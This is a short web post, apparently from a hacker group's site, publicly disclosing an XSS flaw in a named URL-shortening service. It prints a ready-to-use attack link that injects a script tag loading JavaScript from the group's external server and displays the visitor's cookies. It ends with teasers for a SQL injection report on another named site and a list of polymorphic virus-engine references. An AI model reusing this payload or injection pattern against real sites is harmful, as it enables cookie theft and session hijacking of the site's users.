PlanetCreator has reported another critical XSS Vulnerability on Ygncos Shorten Url : http://www.ygn.me
This vulnerability has been informed to :- webmaster

Test Link 

http://shorten.ygn.me/index.php?url=%27%22%3E%3C%2Ftitle%3E%3Cscript%20src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js%3Ealert%28document.cookie%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+PlanetCreator%3C%2Fh1%3E%3C%2Fmarquee%3E

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

Critical SQL Injection in Yatanarpon Web Portal

PlanetCreator reported another critical SQL injection (vulnerability) on several sites of Yatanarpon Web Portal URL : http://www.yatanarpon.com.mm/ SQL injection is a code injection technique that exploits a security vulnerability occurring

Read More

Targets of a Hack Attack

Hacker interests lie in many types of computers on the Internet. Following is a discussion of the types of targets and their appeal to the perpetrators.Corporate Networks Corporate computers are

Read More

[Tut/Sources] References to poly/meta/permutation

Articles: Polymorphic engines – Trigger – SLAM #4 Code: http://vx.netlux.org/lib/static/vdat/tupoleng.htm Polymorphism ant Intel instruction format – LiTlLe VxW – 29A #7 Code: http://vx.netlux.org/29a/29a-7/Articles/29A-7.027 Guide to improving Polymorphic Engines – Rogue

Read More